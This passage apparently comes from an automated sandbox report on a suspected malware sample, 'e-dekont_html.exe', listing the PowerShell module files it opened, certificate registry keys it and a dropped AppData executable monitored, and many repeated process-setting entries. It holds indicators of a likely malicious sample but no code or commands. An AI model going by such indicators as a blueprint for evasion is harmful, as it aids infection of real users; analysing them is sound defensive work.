Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\e-dekont_html.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
